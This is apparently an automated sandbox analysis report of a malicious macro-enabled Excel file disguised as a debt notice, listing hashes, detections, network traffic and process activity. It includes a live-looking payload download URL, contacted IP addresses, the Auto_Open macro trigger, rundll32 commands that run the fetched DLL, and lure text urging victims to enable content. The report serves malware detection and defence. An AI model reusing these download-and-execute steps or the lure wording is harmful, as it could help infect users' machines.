Windows Analysis Report DEBT_2026004977_03182021.xlsm

Overview

General Information

Sample Name: DEBT_2026004977_03182021.xlsm
Analysis ID: 441336
MD5: 042b349265bbac709ff2cbddb725033b
SHA1: 41b74d0c3b18fdcd17a8ca7ebfd883421f39c993
SHA256: ba1912b685d37e4db3b8a622fa966a5e2c2f38c56037bfcc2a9f0a6f39872429
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: DEBT_2026004977_03182021.xlsm Avira: detected
Antivirus detection for URL or domain
Source: http://185.82.219.219/44375.7393215278.dat Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: DEBT_2026004977_03182021.xlsm Virustotal: Detection: 56% Perma Link
Source: DEBT_2026004977_03182021.xlsm ReversingLabs: Detection: 68%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 185.82.219.219:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.127.231.55:80

Networking:

barindex
Yara detected MalDoc1
Source: Yara match File source: sharedStrings.xml, type: SAMPLE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.140.146.180 45.140.146.180
Source: Joe Sandbox View IP Address: 45.140.146.180 45.140.146.180
Source: Joe Sandbox View IP Address: 188.127.231.55 188.127.231.55
Source: Joe Sandbox View IP Address: 188.127.231.55 188.127.231.55
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44375.7393215278.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.219Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.231.55
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.231.55
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.231.55
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.231.55
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.231.55
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.231.55
Source: unknown TCP traffic detected without corresponding DNS query: 45.140.146.180
Source: unknown TCP traffic detected without corresponding DNS query: 45.140.146.180
Source: unknown TCP traffic detected without corresponding DNS query: 45.140.146.180
Source: unknown TCP traffic detected without corresponding DNS query: 45.140.146.180
Source: unknown TCP traffic detected without corresponding DNS query: 45.140.146.180
Source: unknown TCP traffic detected without corresponding DNS query: 45.140.146.180
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.219
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.219
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.219
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.219
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.219
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A4B8C50.jpeg Jump to behavior
Source: global traffic HTTP traffic detected: GET /44375.7393215278.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.219.219Connection: Keep-Alive
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Jun 2021 15:46:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 b1 0a c2 30 10 86 77 c1 77 38 3b e9 90 a6 85 8e 31 8b 28 38 e8 22 3e 40 62 ce 26 90 26 12 53 b4 6f 6f a2 15 c4 d9 d1 f1 fe fb ee bb e3 98 8e 9d e5 d3 09 d3 28 14 67 d1 44 8b bc a9 1a d8 fb 08 1b df 3b c5 e8 2b 64 f4 89 24 54 7a 35 80 6c 4f de fa b0 2c 6e da 44 2c b2 e2 84 2e 62 e0 4c d7 df 86 94 30 3a b6 f3 ae 04 8d 95 6b 8d bb d3 ba ac 9b b2 82 f9 51 f6 2e f6 8b 4f 96 e6 6d d9 4e df 97 ce 08 01 01 17 a1 94 71 2d 44 0f ca 5c 85 b4 08 bb c3 76 0d c2 29 58 e9 e0 3b 84 73 30 e8 94 1d 00 43 f0 21 4d b4 08 84 64 d7 5f f1 cb 5f 3c 00 85 02 e0 de 44 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: c60ww8;1(8">@b&&Soo(gD;+d$Tz5lO,nD,.bL0:kQ.OmNq-D\v)X;s0C!Md__<D0
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000004.00000002.2277154813.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274671747.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268568892.0000000001E07000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing button from the yellow bar above Onoe you have enabled editing. please click Enabl
Source: Screenshot number: 4 Screenshot OCR: Enable Content bytton from the yellow bar above ,,,,,, L' Rr ;^1 I m m RunDLL |~| ,0 There was
Source: Screenshot number: 8 Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En
Source: Screenshot number: 8 Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25
Source: Document image extraction number: 1 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled edding, please click Enable
Source: Document image extraction number: 1 Screenshot OCR: Enable Content bytton from the yellow bar above
Found Excel 4.0 Macro with suspicious formulas
Source: DEBT_2026004977_03182021.xlsm Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: DEBT_2026004977_03182021.xlsm Initial sample: Sheet size: 19412
Excel documents contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F0EB3E64-B098-469B-980C-4533D5392CC4}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="sheet" sheetId="1" r:id="rId1"/><sheet name="sheet1" sheetId="2" r:id="rId2"/><sheet name="sheet2" sheetId="8" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName></definedNames><calcPr calcId="162913"/></workbook>
Source: rundll32.exe, 00000004.00000002.2276985743.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2274475788.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2268420124.0000000001C20000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal96.troj.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$DEBT_2026004977_03182021.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC2B2.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: DEBT_2026004977_03182021.xlsm Virustotal: Detection: 56%
Source: DEBT_2026004977_03182021.xlsm ReversingLabs: Detection: 68%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: DEBT_2026004977_03182021.xlsm Initial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: DEBT_2026004977_03182021.xlsm Initial sample: OLE zip file path = xl/drawings/drawing3.xml
Source: DEBT_2026004977_03182021.xlsm Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: DEBT_2026004977_03182021.xlsm Initial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels
Source: DEBT_2026004977_03182021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs